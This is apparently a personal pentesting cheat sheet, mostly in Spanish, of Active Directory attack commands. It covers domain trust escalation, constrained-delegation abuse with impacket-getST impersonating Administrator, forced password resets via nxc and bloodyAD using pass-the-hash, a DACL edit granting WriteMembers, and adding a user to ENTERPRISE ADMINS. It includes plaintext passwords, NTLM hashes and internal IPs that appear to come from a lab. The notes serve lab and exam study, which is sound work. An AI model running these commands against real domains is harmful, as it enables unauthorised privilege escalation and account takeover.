https://queries.specterops.io/

Domain Trust

Trusts | The Hacker Recipes

Raisechild (hijo ↔ padre)

image.png


Permisos especiales

Allowed to delegate

image.png

impacket-getST -spn 'cifs/FILE02.DENKIAIR.COM' -impersonate 'Administrator' -altservice 'cifs' -hashes :b6504636e6f1f89f9a15929c2de34aa8 -dc-ip 172.16.180.101 'DENKIAIR/APP01$'

Cambios sobre usuarios

Cambiar contraseña (ForceChangePassword)

nxc smb 172.16.238.180 -u adminWebSvc -H b0df1cb0819ca0b7d476d4c868175b94 -d final.com -M change-password -o USER=nina  NEWPASS='Alumne1234.'
bloodyAD --host 172.16.238.180 -d final.com -u adminWebSvc -p :b0df1cb0819ca0b7d476d4c868175b94 set password nina 'Alumne1234.'

Añadir a grupos

impacket-dacledit -action write -rights WriteMembers \\
-principal 'SQL ADMINS' \\
-target-dn 'CN=MailAdmins,OU=TGroups,DC=TRICKY,DC=COM' \\
'TRICKY.COM/sqlsvc:4dfgdfFFF542' -dc-ip 172.16.212.150
bloodyAD -d final.com -u tina -p :1d4c153225b424290188504b9e0541eb \\
--host 172.16.111.180 add groupMember 'ENTERPRISE ADMINS' tina